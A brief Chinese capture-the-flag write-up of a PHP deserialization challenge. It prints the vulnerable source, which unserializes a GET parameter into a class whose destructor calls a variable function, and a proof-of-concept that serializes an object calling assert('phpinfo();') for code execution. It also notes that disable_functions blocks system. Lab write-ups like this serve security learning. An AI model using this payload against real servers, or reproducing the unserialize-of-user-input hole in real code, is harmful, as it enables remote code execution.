进入页面后ctrl + u查看网页源代码
发现一个链接
进入链接发现源码
<?php
#error_reporting(0);
class HelloPhp
{
public $a;
public $b;
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
if(isset($_GET['source']))
{
highlight_file(__FILE__);
die(0);
}
@$ppp = unserialize($_GET["data"]);
一道关于反序列化的题
题目很简单,就是执行一个可变函数
POC
class HelloPhp
{
public $a;
public $b;
}
$h = new HelloPhp();
$h->a = "phpinfo();";
$h->b = "assert";
echo urlencode(serialize($h));
其中 b控制调用的函数, a控制传递的变量
可能会有人(包括我)会去调用system等函数去执行最后发现无功而返
那是因为函数被禁用
通过phpinfo()中的 disable_functions
选项可以看到被禁用了一大批函数